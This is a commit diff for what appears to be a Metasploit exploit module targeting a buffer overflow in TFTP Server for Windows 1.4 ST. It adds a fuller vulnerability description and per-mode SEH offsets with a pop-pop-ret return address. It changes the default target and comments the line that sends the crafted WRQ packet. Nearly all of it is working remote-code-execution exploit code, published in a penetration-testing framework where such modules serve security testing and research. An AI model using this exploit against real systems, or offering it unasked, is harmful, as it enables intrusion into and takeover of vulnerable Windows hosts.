Implemented Changes suggested by wchen-r7 (sinn3r)
parent
feb625cab0
commit
47ecd36805
|
@ -21,7 +21,15 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Name' => 'TFTP Server for Windows 1.4 ST WRQ Buffer Overflow',
|
||||
|
||||
'Description' => %q{ TFTP Server for Windows V1.4 ST WRQ request packet exploit Coded by Mati Aharoni
|
||||
muts..at..offensive-security.com SEH Exploit
|
||||
muts..at..offensive-security.com
|
||||
The vulnerability occurs due to the way TFTP handles the filename parameter extracted from a WRQ request.
|
||||
The server will append the user-supplied filename to TFTP server binary's path without any bounds checking,
|
||||
and then attempt to open this with a fopen(). Since this isn't a valid file path, fopen() returns null,
|
||||
which allows the corrupted data to be used in a strcmp() function, causing an access violation.
|
||||
|
||||
Since the offset is sensitive to how the TFTP server is launched, you must know in advance if your victim machine
|
||||
launched the TFTP as a 'Service' or 'Standalone', and then manually select your target accordingly.
|
||||
A successful attempt will lead to remote code execution; a failed attempt may result a denial-of-service.
|
||||
ported to metasploit by Datacut},
|
||||
|
||||
'Author' =>
|
||||
|
@ -73,16 +81,19 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
# datacut tested ok 19/04/12 on xp sp2 sp3, win 7 sp0 sp1. possible may work for other service packs and or vista
|
||||
|
||||
[ 'Windows XP SP2/SP3 EN', { 'Ret' => 0x416801 , 'Offset' => 1203} ], # pop pop ret tftpserversp.exe
|
||||
[ 'Windows 7 SP0/SP1 EN x64', { 'Ret' => 0x416801 , 'Offset' => 1217} ] # pop pop ret tftpserversp.exe
|
||||
[ 'Windows 7 SP0/SP1 EN x86', { 'Ret' => 0x416801 , 'Offset' => 1223} ] # pop pop ret tftpserversp.exe
|
||||
[ 'Windows XP SP2/SP3 EN Server Mode', { 'Ret' => 0x416801 , 'Offset' => 1203} ], # pop pop ret tftpserversp.exe
|
||||
[ 'Windows XP SP2/SP3 EN Standalone Mode', { 'Ret' => 0x416801 , 'Offset' => 1487} ], # pop pop ret tftpserversp.exe
|
||||
[ 'Windows 7 SP0/SP1 EN x64 Server Mode', { 'Ret' => 0x416801 , 'Offset' => 1217} ], # pop pop ret tftpserversp.exe
|
||||
[ 'Windows 7 SP0/SP1 EN x64 Standalone Mode', { 'Ret' => 0x416801 , 'Offset' => 1501} ], # pop pop ret tftpserversp.exe
|
||||
[ 'Windows 7 SP0/SP1 EN x86 Server Mode', { 'Ret' => 0x416801 , 'Offset' => 1223} ], # pop pop ret tftpserversp.exe
|
||||
[ 'Windows 7 SP0/SP1 EN x86 Standalone Mose', { 'Ret' => 0x416801 , 'Offset' => 1507} ] # pop pop ret tftpserversp.exe
|
||||
],
|
||||
|
||||
'Privileged' => false,
|
||||
|
||||
'DisclosureDate'=> 'Mar 26 2008',
|
||||
|
||||
'DefaultTarget' => 2))
|
||||
'DefaultTarget' => 5))
|
||||
|
||||
|
||||
register_options(
|
||||
|
@ -107,7 +118,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
evil = lead + nops + payload.encoded + near + nseh + [target.ret].pack('V')
|
||||
mode = "netascii"
|
||||
|
||||
sploit = "\x00\x02" + evil + "\0" + mode +"\0"
|
||||
sploit = "\x00\x02" + evil + "\0" + mode +"\0" #Send the WRQ packet (header "\x00\x02")
|
||||
|
||||
udp_sock.put(sploit)
|
||||
|
||||
|
|
Loading…
Reference in New Issue